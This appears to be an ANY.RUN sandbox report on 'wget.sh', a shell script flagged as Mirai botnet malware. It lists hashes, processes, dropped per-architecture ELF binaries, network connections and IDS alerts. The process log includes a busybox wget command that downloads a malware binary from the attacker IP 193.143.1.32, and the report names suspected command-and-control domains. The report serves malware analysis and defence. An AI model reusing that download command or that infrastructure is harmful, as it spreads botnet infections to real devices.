File name:

wget.sh

Full analysis: https://app.any.run/tasks/58f0bce5-c558-44c6-90a6-3d413eb35595
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Analysis date: February 17, 2025, 17:57:42
OS: Ubuntu 22.04.2 LTS
Tags:
auto
botnet
mirai
MIME: text/x-shellscript
File info: POSIX shell script, ASCII text executable
MD5:

D011EEE1C3EE60B1A1DB3AE1E9E65AD6

SHA1:

18F4CEE16484157375F8BBCF21ACCA220A258D66

SHA256:

DD5851B5AB04287B30ED4D1BED6F7940D256849C8D6CFC9936DF59AFA4C328AA

SSDEEP:

48:1ovgOB7vKhkcvG0LvuPF07D46Isj80c6K6oW9:1ovgOB7vK2cvG0LvuPF07D5Isw0BLH9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • MIRAI has been found (auto)

      • busybox (PID: 38771)
      • busybox (PID: 38764)
      • busybox (PID: 38777)
      • busybox (PID: 38784)
      • busybox (PID: 38790)
      • busybox (PID: 38795)
      • busybox (PID: 38800)
      • busybox (PID: 38818)
      • busybox (PID: 38813)
      • busybox (PID: 38828)
      • busybox (PID: 38823)
  • SUSPICIOUS

    • Connects to the server without a host name

      • busybox (PID: 38771)
      • busybox (PID: 38764)
      • busybox (PID: 38777)
      • busybox (PID: 38784)
      • busybox (PID: 38790)
      • busybox (PID: 38795)
      • busybox (PID: 38813)
      • busybox (PID: 38800)
      • busybox (PID: 38818)
      • busybox (PID: 38823)
      • busybox (PID: 38828)
      • busybox (PID: 38834)
    • Potential Corporate Privacy Violation

      • busybox (PID: 38764)
      • busybox (PID: 38771)
      • busybox (PID: 38777)
      • busybox (PID: 38784)
      • busybox (PID: 38790)
      • busybox (PID: 38795)
      • busybox (PID: 38800)
      • busybox (PID: 38813)
      • busybox (PID: 38818)
      • busybox (PID: 38823)
      • busybox (PID: 38828)
    • Modifies file or directory owner

      • sudo (PID: 38758)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
272
Monitored processes
64
Malicious processes
14
Suspicious processes
0

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
38754/bin/sh -e /etc/NetworkManager/dispatcher.d/01-ifupdown connectivity-change/usr/bin/dashnm-dispatcher
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38757/bin/sh -c "sudo chown user /home/user/Desktop/wget\.sh && chmod +x /home/user/Desktop/wget\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/wget\.sh "/usr/bin/dashany-guest-agent
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38758sudo chown user /home/user/Desktop/wget.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38759chown user /home/user/Desktop/wget.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38760chmod +x /home/user/Desktop/wget.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38761sudo -iu user /home/user/Desktop/wget.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38762/bin/sh /home/user/Desktop/wget.sh/usr/bin/dashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38763/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkdash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38764/bin/busybox wget http://193.143.1.32/jklarm -O jklarm/usr/bin/busybox
dash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38765systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service/usr/bin/systemctlsnapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
5
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
38795busybox/home/user/jklmipsbinary
MD5:9F505111A75F65954723020BEE516BC1
SHA256:5E2D9F9531AFF471DD5D92B772C57BA66CFB39AEFEF46FB878F3D30DB9A8C1C8
38784busybox/home/user/jklarm7binary
MD5:82FEACFDBA7096DD1F30AE81B443ED99
SHA256:DEC770C2901A222EC48915ADFE1F7C6091FC3E9B03941A53F44B21593AF862D2
38800busybox/home/user/jklmpslbinary
MD5:E21D64812567D5607C06F765F06B40C2
SHA256:3132F0D33BA9FC64E8258E2094745F4FE60D4F044B5B8FE0AEF5E311D9E0ADAF
38818busybox/home/user/jklsh4binary
MD5:9CC4266655DF49F75CD670196805381D
SHA256:3E0982830EBDEFF2461F1FAE1BB37C3362884EA8614FFCABA90E2409D09B387F
38790busybox/home/user/jklm68kbinary
MD5:0E6CF4992F8F2394394CA5972339A663
SHA256:30C5E7B561A3E61AB67AF8181FD6B996258325BF8137531FFE9D2B3F438A3D46
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
28
TCP/UDP connections
22
DNS requests
32
Threats
31

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
195.181.175.41:443
https://odrs.gnome.org/1.0/reviews/api/ratings
DE
unknown
GET
200
212.102.56.179:443
https://odrs.gnome.org/1.0/reviews/api/ratings
IT
binary
1.64 Mb
whitelisted
GET
200
169.150.255.181:443
https://odrs.gnome.org/1.0/reviews/api/ratings
US
binary
1.64 Mb
whitelisted
POST
200
185.125.188.59:443
https://api.snapcraft.io/v2/snaps/refresh
GB
binary
45.2 Kb
whitelisted
POST
200
185.125.188.58:443
https://api.snapcraft.io/v2/snaps/refresh
GB
binary
45.2 Kb
whitelisted
GET
204
91.189.91.98:80
http://connectivity-check.ubuntu.com/
US
whitelisted
GET
91.189.91.98:80
http://connectivity-check.ubuntu.com/
US
whitelisted
GET
91.189.91.96:80
http://connectivity-check.ubuntu.com/
US
whitelisted
POST
200
185.125.188.55:443
https://api.snapcraft.io/api/v1/snaps/auth/nonces
GB
binary
54 b
whitelisted
POST
200
185.125.188.54:443
https://api.snapcraft.io/api/v1/snaps/auth/sessions
GB
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
91.189.91.96:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
484
avahi-daemon
224.0.0.251:5353
unknown
91.189.91.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
212.102.56.179:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
37.19.194.80:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
185.125.188.55:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
38764
busybox
193.143.1.32:80
LLC Baxet
RU
malicious
512
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
38771
busybox
193.143.1.32:80
LLC Baxet
RU
malicious

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::96
  • 2620:2d:4002:1::197
  • 2001:67c:1562::24
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::98
  • 2001:67c:1562::23
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::2b
  • 91.189.91.98
  • 185.125.190.17
  • 91.189.91.97
  • 185.125.190.18
  • 185.125.190.49
  • 91.189.91.49
  • 91.189.91.48
  • 185.125.190.97
  • 185.125.190.96
  • 185.125.190.48
  • 185.125.190.98
  • 91.189.91.96
whitelisted
odrs.gnome.org
  • 212.102.56.179
  • 195.181.170.19
  • 207.211.211.26
  • 37.19.194.80
  • 169.150.255.184
  • 169.150.255.181
  • 195.181.175.41
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::112
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.54
  • 185.125.188.55
  • 185.125.188.58
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::6d
  • 2620:2d:4000:1010::42
whitelisted
google.com
  • 142.250.185.238
  • 2a00:1450:4001:813::200e
whitelisted
21.100.168.192.in-addr.arpa
unknown
serisbot.geek
unknown
serisontop.dyn
unknown

Threats

PID
Process
Class
Message
38764
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38771
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38777
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38784
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38790
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38795
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38800
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38813
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38818
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
38823
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info